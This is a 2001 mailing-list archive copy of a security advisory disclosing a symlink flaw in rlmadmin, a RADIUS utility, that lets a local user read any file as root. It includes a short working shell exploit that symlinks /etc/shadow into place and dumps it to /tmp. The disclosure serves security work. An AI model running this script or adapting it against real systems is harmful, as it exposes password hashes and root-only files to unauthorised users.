rlmadmin v3.8M view file symlink vulnerability

From: Digital Shadow (wodahsat_private)
Date: Fri Sep 07 2001 - 02:32:46 PDT

Next message: Aviram Jenik: "Exchange Public Folders Information Leakage"

Previous message: Roman Drahtmueller: "SuSE Security Announcement: screen (SuSE-SA:2001:030)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
[Ministry-Of-Peace] - Security Advisory #01 - 07th Sept 2001        
rlmadmin v3.8M view file symlink vulnerability                      
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --

Overview:
---------
 rlmadmin is a user management utility for RADIUS which comes with the
 Merit AAA Server package (http://www.merit.edu/michnet/dial-in/aaa/).
 Using this program and a simple symlink, you can view any file on the
 system as root.


Description:
------------
 Using the -d option of rlmadmin allows you to specify the directory
 in which it will look for its configuration files.

 The files that it looks for in this directory during startup are:
   dictionary     -  dictionary translations for parsing requests and
                     generating responses.
   rlmadmin.help  -  the help file that is displayed on startup.
   vendors        -  vendor specific information.

 The problem occurs when rlmadmin reads from the "rlmadmin.help" file.
 If this file is symlinked to another file (such as /etc/shadow), the
 program blindly follows the link, causing the contents of the file to
 be displayed when the program starts up.


Versions Affected:
------------------
 rlmadmin v3.8M (and earlier?)
 rlmadmin v5.01 Commercial (available from www.interlinknetworks.com -
                            this version isn't setuid root by default,
                            but is still affected if set by the admin)


Exploit Code:
-------------
#!/bin/sh
# -- -- -- -- -- -- -- -- -- -- -- -- -- -- #
# rlmadmin view file symlink vulnerability  #
#       (c)oded 2001 Digital Shadow         #
#        www.ministryofpeace.co.uk          #
# -- -- -- -- -- -- -- -- -- -- -- -- -- -- #
bloc=/usr/private/etc # executable file location
cloc=/usr/private/etc/raddb # config file location
file=/etc/shadow # file to read
echo == rlmadmin exploit - visit \
www.ministryofpeace.co.uk for more!
echo = Initialising...
mkdir /tmp/peace; cd /tmp/peace
cp $cloc/dictionary $cloc/vendors .
ln -s $file rlmadmin.help
echo = Exploiting...
echo quit | $bloc/rlmadmin -d /tmp/peace > peace.log
mv peace.log /tmp; rm dictionary rlmadmin.help vendors
echo = Done!
echo == Now look in /tmp/peace.log!


Credits:
--------
Vulnerability discovered by Digital Shadow.

-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
 advisories[at]ministryofpeace.co.uk  --  www.ministryofpeace.co.uk 
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --

-- 
Sent through GMX FreeMail - http://www.gmx.net

Next message: Aviram Jenik: "Exchange Public Folders Information Leakage"
Previous message: Roman Drahtmueller: "SuSE Security Announcement: screen (SuSE-SA:2001:030)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Sep 07 2001 - 08:40:36 PDT